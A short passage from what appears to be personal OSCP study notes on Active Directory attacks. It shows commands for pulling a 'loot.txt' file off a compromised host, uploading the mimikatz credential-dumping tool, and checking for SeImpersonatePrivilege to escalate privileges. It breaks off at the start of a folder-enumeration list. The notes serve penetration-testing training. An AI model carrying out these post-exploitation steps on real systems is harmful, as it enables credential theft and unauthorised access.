OoStellarnightoO/OSCP_Notes/12-ActiveDirectory.md

 # once logged in, you can download and upload files
 PS something@something> download loot.txt # this downloads loot.txt from the host to your kali's current working directory PS something@something> upload mimikatz.exe # this uploads your mimikatz.exe from your current working directory.
 If your mimikatz is somewhere else, you need to provide either the absolute or relative path

+whoami /priv  # do this first once you are in!
+Maybe you get lucky and there is SeImpersonatePrivilege
 ```

 2) Do manual enumeration of MS01 first.
 This means checking out the following folders: